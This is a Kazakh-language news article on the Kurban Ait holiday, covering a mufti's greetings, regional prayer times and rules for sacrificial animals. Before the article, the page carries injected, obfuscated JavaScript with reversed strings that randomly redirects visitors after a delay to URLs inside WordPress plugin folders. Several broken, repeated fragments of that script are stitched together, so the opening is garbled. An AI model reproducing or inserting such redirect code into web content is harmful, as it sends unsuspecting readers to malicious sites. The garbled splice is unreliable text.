$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/434_7277544f99518774da7ff957cbab5a10.jpg» height=»325″ width=»434″ />
Құрбан айт — құтты мереке!
АСТАНА. 3 қараша. ҚазАқпарат /Гүлмира Алякпарова/ — Жексенбі, 6 қараша күні мұсылмандардың ұлық мерекелерінің бірі — Құрбан айт мейрамы басталады. Үш күнге созылатын мейрам жыл сайын хижра — мұсылман күнтізбесі бойынша Зүлхижа айының оныншы жұлдызында (Арафа күнінен кейін) және Ораза айт мейрамынан 70 күн өткеннен кейін басталады.
Бұл күні Меккеге барған тәуапшылар Мина алқабында құрбандық шалу рәсімі мен қажылықтың басқа да талап-шарттарын атқарса, қажылық жасауға қалтасы көтермеген мұсылмандар мешіттерде айт намазын оқып, айтулы мерекенің ең маңызды рәсімі — құрбандық шалады.
Қазақстан Мұсылмандары діни басқармасы және Орта Азия мүфтилер кеңесінің төрағасы, бас мүфти, шейх Әбсаттар қажы Дербісәлінің айтуынша, халқымыз барлық мұсылман қауымы үшін ең қасиетті саналатын екі ұлық мерекені — Ораза айт пен Құрбан айт мейрамдарын дініміздің өзге құндылықтары тұралап, кенжелеген кеңес кезеңінің өзінде айрықша қуанышпен, ерекше ілтипатпен өткізіп келді.
Дегенмен, ұлық мейрамды ресми, мемлекеттік деңгейде атап өтуге қазақ елі Тәуелсіздікке қол жеткізгеннен кейін ғана мүмкін болды. Ел Президенті Нұрсұлтан Назарбаевтың 2005 жылғы желтоқсанның 30-ында қол қойған, «Еңбек туралы» заңға енгізілген өзгерістерге сәйкес, Құрбан айттың бірінші күні демалыс болып табылады. Бұл үшін иісі мұсылман барша қазақстандық Аллаһ Тағалаға мың мадақ етіп, оған мұрындық болған Елбасы Н.Ә.Назарбаевқа білдірер алғысы шексіз.
«Ендігі кезекте, — дейді Ә.Дербісәлі, — Қазақстанның бүкіл қалалары, аудандары, өңірлері мен шағын ауыл-аймақтарына дейін осы айт мерекесінің ерекше көңіл күйін қалыптастырып, ұлттық, бүкіл халықтық деңгейге көтеру қажет.
Жағдайы жеткендердің бәрі құрбан шалса, оның еті тұрмысы төмендерге таратылса, халқымыз арасында ауызбіршілік пен сыйластық та артқан үстіне арта береді. Айт келгенде әр отбасында қуанбанбайтын, шаттанбайтын кісі қалмауы ләзім. Бесіктегі баладан төрдегі ересектерге дейін барша отандастарымызды айт мейрамын жыл сайын сағына күтетін деңгейге жеткізуге тиіспіз. Балаларға арнайы ойыншықтар мен сыйлықтар таратуды ұйымдастырсақ, бұл мереке олардың да сағына күтетін мейрамына айналары анық. Жақын-жұраттарымызға да сый-сияпат, тарту-таралғыны дәл осы айт күндерінде көбірек жасауды әдетімізге айналдырған дұрыс. Сонда жердегілер осындай иләһи мерекені тойлап, мәз-мәйрам болып жатқанда, көктегі періштелер де мұсылман жұртшылығының бірлік-ынтымағына тілектес болатыны сөзсіз», — дейді ол Құрбан айт меркесі қарсаңында қазақстандық мұсылмандарға жолдаған құттықтауында.
Ал «Нұр Астана» Орталық мешітінің наиб имамы Төлеби Оспанның айтуынша, діни мерекелерді лайықты атап өтуде қоғамның, соның ішінде жастардың арасында, осыдан бірер жыл бұрынғы үдеріске қарағанда — оң бетбұрыс бар. «Мұны жұма күнгі намаздардан-ақ көруге болады. Ол күндері елордадағы Орталық мешіт мінәжат етушілерге лық толады. Оның дені 20-35 жас аралығындағы азаматтар болса, тек 10 пайызын ғана ақсақалдарымыз құрап отыр», — дейді наиб имам.
Әрине, бұл Құрбан айт мерекесінің қадір-қасиеті мен орындалатын ғибадаттарды халыққа түсіндіріп, насихаттаудың арқасы. «Нұр Астана» мешіті мерекенің шарттары мен талаптарын келушілерге ауызша түсіндіріп қана қоймай, Ә.Дербісәлінің «Құрбан айт — құтты мереке!» атты кітапшасын демеушілердің қолдауымен жыл сайын мол данамен көбейтіп, астаналық мұсылмандарға тегін таратуды дәстүрге айналдырды.
Дегенмен, Мәуліт, Қадір түні және өзге де діни кештер бүгіннің өзінде ұлттық мерекеге айналып келеді. Кеңес одағы кезінде Қазақстанда бір де бір діни оқу орны болмаған болса, қазір «Нұр-Мүбәрак» университеті, имамдардың білімін жетілдіретін Ислам институты, сондай-ақ облыстарда 10 діни медресе халыққа қызмет көрсетуде. 20 жыл бұрын ел бойынша небәрі 68 мешіт қана болса, қазір олардың саны 2 мың 500-ден асып жығылады. Тәуелсіздікке дейін қажылық парыздарын өтеуге барғандардың саны саусақпен санарлық болса, бүгінде әр жылы 4 мыңға жуық қазақстандық Меккеге сапар шегуде.
Биыл Құрбан айттың намазы Астана қаласындағы мешіттерде таңертеңгі сағат 09.00-де, Алматы қаласында — 08.10-да, Алматы облысында — 08.10-да, Талдықорған қаласында — 08.30-да, Жамбыл облысында — 08.30-да, Оңтүстік Қазақстан облысында — 08.30-да, Қызылорда облысында — 09.00-де, Қарағанды облысында -09.00-де, Жезқазған қаласында — 09.00-де, Көкшетау қаласында -09.00-де, Павлодар облысында — 09.00-де, Петропавл облысында — 09.30-да, Қостанай облысында — 09.30-да, Шығыс Қазақстан облысында — 08.30-да, Батыс Қазақстан, Маңғыстау, Атырау, Ақтөбе облыстарында жергілікті уақытпен — 09.00-де оқылады.
Енді Құрбан айт мерекесінің мән-маңызына және оны дұрыс атап өтудің жөн-жосығына тоқталсақ. Жалпы ислам дініндегі мейрамдардың барлығы мұсылман қауымын ғана емес, сонымен бірге адамзаттың дүйім жұртын татулық пен бірлікке, сыйластық пен ауызбірлікке, кешірімге шақыратыны белгілі. Олай болса, Құрбан айт мерекесі де адамдардың бірі-біріне ізгі ниеттер тілеп, бір-бірінің көңіл-күйін көтеріп, ренжітіп алған кездері болса кешірім жасасатын күн. Қасиетті Құран Кәрім және Ислам тарихы бойынша бұл мереке мен оның шежіресі сонау адамзаттың атасы Адам (ғ.с.) ата және дәстүрлі діндердің түп атасы Ибраһим (ғ.с.) мен оның ұлы Исмайыл (ғ.с.) пайғамбарлармен тығыз байланысты.
Құрбан — араб тілінде «жақындау», яғни жасаған сауап істер арқылы жүректі тазартып, Аллаһқа жақындай түсу дегенді білдіреді. Ал шариғаттағы терминдік мағынасы — «шарттарымен санаса отырып, құлшылық ниетімен мал бауыздау» дегенге саяды. Хадистерде жылдың ең қадірлі күні Құрбан айттың алғашқы күні екендігі айтылған. Пайғамбарымыз бұл жайында: «Адам баласы Құрбан айт күні қан шығарудан (құрбандық шалу) басқа абзал амал арқылы Аллаһ Тағалаға жақын болған емес. Құрбандық ретінде шалған малы қиямет күні мүйіздері, тұяқтары және жүндерімен келеді. Ағызылған қан жерге тамбай тұрып Аллаһ Тағаланың құзырында ерекше жоғары дәрежеге жетеді. Сондықтан да шын жүректен әрі ризашылықпен құрбандарыңды шалыңдар», — деп құрбандық шалудың қаншалықты жауапты әрі сауапты іс екенін шегелеп айтқан.
Мұсылмандар Құрбан айт мерекесін қалай атап өтеді?
Мейрамның алғашқы күні жақсылап ғұсыл құйынғаннан (денені толықтай жуу) кейін, әдемі таза киімдерін киіп, үстіне хош иіс сеуіп, мешітке айт намазына барады. Қажылық өтеушілер Қағбаға жүзін қаратып дұға оқиды. Бақилық болған жақын-жұрағаттарына арнап Құран бағыштайды. Құрбандық етімен ауыз ашу үшін намаздың алдында ештеңе жемеу абзал. Айт намазы оқылғаннан кейін Аллаһ разылығы үшін мал шалынып, ақ түйенің қарны жарылады. Көрші-қолаң, туыс-туғанды қыдырыстап, «Айт құтты болсын!» айтысады. Айт күндері мейлінше көтеріңкі көңіл күйде, кешірімді болуға тырысу керек. Ренжіскен кісілер қайта табысып, айт күндері татуласқан жөн. Ауырып жатқан кісілердің көңілін сұрап, арнайы бас сұғу, жетім-жесір, мұң-мұқтаждарға қол ұшын беріп, оларға да айттың қуанышын сездіру өте сауапты істерге жатады. Бұған қоса, әке-шешесіне, отбасындағы жандарға, көрші-қолаң, жора-жолдастарына мүмкіндігінше кішігірім болса да сәлем-сауқат, сый-сияпат жасап, айт мейрамын ерекше өткізуге де болады. Осылай, бүтін мұсылман баласы адамдарды бір-бірінен алыстатпай, қайта жақындата түсуді насихаттайтын хақ дін — Ислам діні мен пайғамбарлардың ісін қайта жаңғыртады.
Құрбандық шалу. Бұл күні шариғат бойынша барша мұсылманға ортақ ғибадат — құрбандық шалынады. Құрбандық деп Құрбан айт күндерінде ғибадат ниетімен шалынатын малды айтады. Сондықтан бұл құрбандық шалу мерекесі, яғни Құрбан айт деп аталады.
Құрбан айт күндері (алғашқы үш күні) шалынатын мал «ұдһия» деп аталады. Құрбандық шалудың мәнісінің кеңдігін ұғыну үшін діннің не екенін, құлшылықтың не үшін жасалатынын жақсы білген жөн. Құрбандық шалу тек мал бауыздаумен ғана шектелмейді. Онда адамның ішкі ниеті, шын пейілі, дінге бекемдігі, тақуалығы, басқаларға жанашырлығы таразыға түседі. Сондай-ақ пенденің пендешілігі мен мәрттігі, сараңдығы мен жомарттығы да сыналады.
Алайда, кез-келген мал құрбандыққа жарай бермейді. Құрбандық ретінде шалынатын малдың ерекшеліктері мынадай болу қажет: 1. Құрбандыққа қой, ешкі, сиыр, түйе секілді малдар (еркек-ұрғашысы бірдей) жарамды. Ал үйрек, қаз, тауық, түйетауық, елік секілді және тағы басқа да аң-құстар құрбандыққа жарамсыз. Бұларды құрбандық ретінде шалу харамға жақын мәкрүһ болып табылады. Өйткені мұнда отқа табынушылардың нышаны бар. 2. Құрбандыққа жарайтын қой мен ешкі ең кемі бір жасар болуы қажет. Дегенмен, алты айлық қозы бір жасар қой секілді ірі, қоңды болса ол құрбандыққа жарамды. Ал ешкі міндетті түрде бір жасқа, сиыр екі жасқа, түйе бес жасқа толған болуы қажет. 3. Құрбандық малдың дені сау, етті және дене мүшелері түгел болуы керек. Сонымен қатар оның бойында малды құрбандыққа жарамсыз ететін кемшіліктер болмауы тиіс. Атап айтқанда, екі немесе бір көзінің соқыр болуы, бауыздалатын жерге өздігінен жүріп бара алмайтындай әлсіз, көтерем болуы, екі құлағының не бір құлағының басым бөлігі болмауы, тістері түгелдей немесе бір бөлігі түсіп қалған болса, қос мүйізі немесе бір мүйізі түбінен түсіп қалған болса, сондай-ақ желін ұшының түсіп қалуы, жетекке көнбейтін, үйірге қосуға жарамайтындай асау немесе ауру екендігі анық белгілі болса.
Қой немесе ешкі іспетті ұсақ малды тек бір адам ғана, ал түйе немесе сиыр секілді ірі-қара малдарды бір кісіден жеті адамға дейін бірігіп соя алады. Және біріккен кісілердің барлығының ниеті құрбандық құлшылығын өтеу мақсатында болуы керек. Егер де осы адамдардың ішінен біреуі құрбандыққа тек етін алу ниетімен қосылса, барлығының да құрбандығы қабыл болмайды. Сонымен қатар, құрбандық малды кез-келген адамның дүниеден озған туысының немесе қадір тұтқан кісілердің, құрбандық жасауға жағдайы жоқ адамдардың сауабына бағыштау рұқсат етіледі.
Шариғат бойынша нисап мөлшеріндегі, яғни 85 грамм алтынға тең ақшасы бар, бас бостандықтағы, ақыл-есі бүтін, жолсапарда емес мұсылманға құрбан шалу уәжіп етілген. Ал құрбандық шалуға шамасы жоқ мұсылмандар, ниеттері арқылы сауапқа жете алады. Хадистерде «мұсылман баласының ниетінің тазалығына қарай сауабы беріледі», «оның ізгі ниеті амалынан қайырлы» деп айтылған. Яғни, қай істе болмасын мұсылман баласын ниетін таза ұстауға шақырады. Сол себепті «Раббым, мүмкіндік нәсіп еткеніңде мен де құрбандық шалар едім» — деген ниетте болса, «мейірімді Раббымыз оған да құрбандық шалған жанның сауабындай сауап береді», деп жазылған. Құрбан шалуға жағдайы жоқ кісілерге жасалған және бір жеңілдік, ол — айт күні жуынып-шайынып, тазалану. Себебі бұл тазалық оларға құрбандық шалғандай сауап әкеледі.
Құрбандық шалу ғибадаты Аллаһ Тағала талап еткен, белгіленген мезгілде және орында жасалуы шарт. Сондықтан құрбанның дұрыс болуы үшін діни тұрғыдан оның белгіленген уақытта бауыздалғаны жөн. Құрбан шалудың уақыты құрбан айттың бірінші күні айт намазынан кейін басталып, айттың үшінші күні ақшамға аз уақыт қалғанға дейін жалғасады. Жарықтандыру жүйесі нашар орындарда түрлі қателіктерге жол бермеу үшін түнде құрбандық шалу мәкрүһ болып саналады. Ал жарықтандыру мүмкіндігі жеткілікті жерлерде түнде де құрбандық шалына береді. Құрбан айтқа арнап сатып алынған мал айт күндері бауыздалмаса, малдың өзін садақа ретінде атау қажет. Үзір себептерге байланысты Құрбан айт намазына бара алмай қалған адам, намаз оқып болатындай уақыт өткеннен кейін құрбан шала беруіне болады.
Құрбандық шалушы бай болсын, кедей болсын өзінің құрбандығының етін жеуіне болады. Малдың етін үш бөлікке бөліп тарату мұстахап (жақсы амал) саналады. Бір бөлігі — туған-туыстарына және бай болса да көршілеріне таратылады. Екінші бөлігі — кедей және мұқтаж адамдарға, үшінші бөлігі — өзінің отбасына, бала-шағасына тиесілі. Халық арасында қан шықса болды деген теріс ұғым қалыптасқан. Шариғат бойынша құрбандыққа шалынған малдың етін, терісін, сирақ-басы мен сүтін сату не болмаса оларды құрбандық жасалған жерде лақтырып кету мәкрүһ саналады. Барынша ысырап жасамауға тырысып, құрбандықтың ішек-қарнына дейін пайдаға жаратуға тырысу керек. Ең абзалы малдың етінен бөлек мүшелерін сатып ақшасын мұқтаж жандарға беру.
Бұл күндері халқының жетпіс пайызын Ислам дінін ұстанушылар құрайтын Қазақстан, ынтымақ-бірлігімен, достығымен әлем жұртшылығының назарын өзіне аудартып, өзге дін, өзге ұлт өкілдеріне құрметпен қарайды. Биыл Құрбан айт мерекесі ел Тәуелсіздігінің 20 жылдығы қарсаңында атап өтіледі. Сондықтан, татулықты, адамдардың бірлігі мен бауырластықты күшейтуге үндейтін мұндай діни мерекелер ұлтаралық және дінаралық қарым-қатынастары жарасқан Қазақстан халқының ауызбірлігін одан бетер бекемдете түсетініне сенімдіміз.
Айт күнгі ізгі ниеттеріңіз бен шалған құрбандықтарыңызды Алла Тағала қабыл етсін. Ұлық мереке мүбарак болып, әр отбасына бақыт, береке қонсын!
http://www.inform.kz/kaz/article/2416805
www.kyzmet-gazeti.kz {jcomments on}
Leave a Reply